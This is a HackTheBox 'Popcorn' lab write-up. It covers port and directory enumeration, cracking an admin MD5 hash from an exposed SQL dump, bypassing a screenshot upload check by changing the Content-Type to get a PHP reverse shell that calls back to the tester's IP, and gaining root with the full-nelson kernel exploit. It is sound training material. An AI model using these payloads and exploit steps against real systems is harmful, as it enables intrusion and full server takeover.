Popcorn

tags: HTB Medium Linux OSCP
Platform: Hackthebox
Difficult: Medium
S.O.: Linux

Enumeration

Nmap

To get started, we run a quick open ports scan.

$ nmap -p- -T4 10.10.10.6
Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-07 18:26 CEST
Nmap scan report for 10.10.10.6
Host is up (0.095s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 26.41 seconds

Now that we know the open ports, let's scan them in depth.

$ nmap -A -Pn -p 22,80 10.10.10.6
Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-07 18:38 CEST
Nmap scan report for 10.10.10.6
Host is up (0.096s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_  2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp open  http    Apache httpd 2.2.12 ((Ubuntu))
|_http-server-header: Apache/2.2.12 (Ubuntu)
|_http-title: Site doesn´t have a title (text/html).
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.17 - 2.6.36 (95%), Linux 2.6.30 (95%), Linux 2.6.32 (95%), Linux 2.6.35 (95%), Linux 2.4.20 (Red Hat 7.2) (95%), Linux 2.6.17 (95%), AVM FRITZ!Box FON WLAN 7240 WAP (94%), Canon imageRUNNER ADVANCE C3320i or C3325 copier (94%), Android 2.3.5 (Linux 2.6) (94%), Epson WF-2660 printer (94%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   96.47 ms 10.10.14.1
2   96.58 ms 10.10.10.6

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.01 seconds

Port 80

Gobuster

$ gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://10.10.10.6/ -x php,txt,zip,rar,tar,bak -t 50 2>/dev/null
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.6/
[+] Threads:        50
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt,zip,rar,tar,bak
[+] Timeout:        10s
===============================================================
2021/05/07 18:40:59 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htaccess.bak (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.txt (Status: 403)
/.htaccess.zip (Status: 403)
/.htaccess.rar (Status: 403)
/.htaccess.tar (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.zip (Status: 403)
/.htpasswd.rar (Status: 403)
/.htpasswd.tar (Status: 403)
/.htpasswd.bak (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.txt (Status: 403)
/cgi-bin/ (Status: 403)
/index (Status: 200)
/rename (Status: 301)
/test (Status: 200)
/test.php (Status: 200)
/torrent (Status: 301)
===============================================================
2021/05/07 18:45:41 Finished
===============================================================

Well, inside the test.php we can find the result of the phpinfo() function, inside torrent we can find a Torrent Hoster installation and inside rename we find an api that allows us to rename files.

Torrent Hoster

Let's enumerate this directory.

Gobuster

$ gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://10.10.10.6/torrent/ -x php,txt,torrent -t 50 2>/dev/null
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.6/torrent/
[+] Threads:        50
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt,torrent
[+] Timeout:        10s
===============================================================
2021/05/07 19:12:59 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.txt (Status: 403)
/.htpasswd.torrent (Status: 403)
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.txt (Status: 403)
/.htaccess.torrent (Status: 403)
/admin (Status: 301)
/browse (Status: 200)
/browse.php (Status: 200)
/comment (Status: 200)
/comment.php (Status: 200)
/config (Status: 200)
/config.php (Status: 200)
/css (Status: 301)
/database (Status: 301)
/download (Status: 200)
/download.php (Status: 200)
/edit (Status: 200)
/edit.php (Status: 200)
/health (Status: 301)
/hide (Status: 200)
/images (Status: 301)
/index (Status: 200)
/index.php (Status: 200)
/js (Status: 301)
/lib (Status: 301)
/login (Status: 200)
/login.php (Status: 200)
/logout (Status: 200)
/logout.php (Status: 200)
/preview (Status: 200)
/readme (Status: 301)
/rss (Status: 200)
/rss.php (Status: 200)
/secure (Status: 200)
/secure.php (Status: 200)
/stylesheet (Status: 200)
/templates (Status: 301)
/thumbnail (Status: 200)
/thumbnail.php (Status: 200)
/torrents (Status: 301)
/torrents.php (Status: 200)
/upload (Status: 301)
/upload.php (Status: 200)
/upload_file (Status: 200)
/upload_file.php (Status: 200)
/users (Status: 301)
/validator (Status: 200)
/validator.php (Status: 200)
===============================================================
2021/05/07 19:15:42 Finished
===============================================================

Inside database we can find a database file with the admin credentials.

-- 
-- Table structure for table `users`
-- 

CREATE TABLE `users` (
  `id` int(10) unsigned NOT NULL auto_increment,
  `userName` varchar(40) NOT NULL default '',
  `password` varchar(40) NOT NULL default '',
  `privilege` varchar(10) NOT NULL default '',
  `email` varchar(30) NOT NULL default '',
  `joined` datetime NOT NULL default '0000-00-00 00:00:00',
  `lastconnect` datetime NOT NULL default '0000-00-00 00:00:00',
  PRIMARY KEY  (`id`),
  UNIQUE KEY `userName` (`userName`)
) ENGINE=MyISAM  DEFAULT CHARSET=latin1 AUTO_INCREMENT=4 ;

-- 
-- Dumping data for table `users`
-- 

INSERT INTO `users` VALUES (3, 'Admin', '1844156d4166d94387f1a4ad031ca5fa', 'admin', '[email protected]', '2007-01-06 21:12:46', '2007-01-06 21:12:46');

And now, with CrackStation we can recover the password hash.

1844156d4166d94387f1a4ad031ca5fa : md5 : admin12

But is not correct... Ok as we see we can register so, let's do it.

Ok, now we can upload a torrent file and after that we can edit his properties and upload a screenshot for it. We will try to upload a shell instead of an image.

Exploitation

Getting shell

To allow us to upload our PHP shell instead of the image we have to intercept the upload with BURP and replace the Content-Type of application/x-php to image/gif.

POST /torrent/upload_file.php?mode=upload&id=df05aca78528ff7075b4c471d5795c136171f4b3 HTTP/1.1
[...]

-----------------------------10515614755774646911643331688
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/x-php

<?php
    set_time_limit (0);
    $VERSION = '1.0';
    $ip = '10.10.14.22';
    $port = 8787;
[...]
POST /torrent/upload_file.php?mode=upload&id=df05aca78528ff7075b4c471d5795c136171f4b3 HTTP/1.1
[...]

-----------------------------10515614755774646911643331688
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: image/gif

<?php
    set_time_limit (0);
    $VERSION = '1.0';
    $ip = '10.10.14.22';
    $port = 8787;
[...]

We continue the request and we can see that the image has been uploaded successfully.

Upload: shell.php
Type: image/gif
Size: 2.181640625 Kb
Upload Completed.
Please refresh to see the new screenshot.

Now we just have to reload the properties page of the torrent, put a terminal to listen and click on the banner where the image would be seen.

$ nc -lnvp 8787
listening on [any] 8787 ...
connect to [10.10.14.22] from (UNKNOWN) [10.10.10.6] 57005
Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux
 00:14:05 up 40 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              [email protected]   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: no job control in this shell
[email protected]:/$ cd /home
[email protected]:/home$ ls
george
[email protected]:/home$ cd george/
[email protected]:/home/george$ ls
torrenthoster.zip  user.txt
[email protected]:/home/george$ cat user.txt 
CENSORED_FLAG
[email protected]:/home/george$

Post exploitation

Privilege escalation: www-data to root

Linux exploit suggester

Well, let's see what exploits we can use on the system with linux-exploit-suggester.sh.

[email protected]:/tmp$ ./linux-exploit-suggester.sh 

Available information:

Kernel version: 2.6.31
Architecture: i686
Distribution: ubuntu
Distribution version: 9.10
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS

Searching among:

76 kernel space exploits
48 user space exploits

Possible Exploits:

[+] [CVE-2012-0056,CVE-2010-3849,CVE-2010-3850] full-nelson

   Details: http://vulnfactory.org/exploits/full-nelson.c
   Exposure: highly probable
   Tags: [ ubuntu=(9.10|10.10){kernel:2.6.(31|35)-(14|19)-(server|generic)} ],ubuntu=10.04{kernel:2.6.32-(21|24)-server}
   Download URL: http://vulnfactory.org/exploits/full-nelson.c
[...]

The full-nelson exploit looks like it's going to give us good results!

We upload the exploit to the system, compile it and execute it.

[email protected]:/tmp$ gcc full-nelson.c -o full-nelson
[email protected]:/tmp$ ./full-nelson 
[*] Resolving kernel addresses...
 [+] Resolved econet_ioctl to 0xf8426280
 [+] Resolved econet_ops to 0xf8426360
 [+] Resolved commit_creds to 0xc01645d0
 [+] Resolved prepare_kernel_cred to 0xc01647d0
[*] Calculating target...
[*] Triggering payload...
[*] Got root!
# id
uid=0(root) gid=0(root)
# cd /root
# cat root.txt
CENSORED_FLAG
#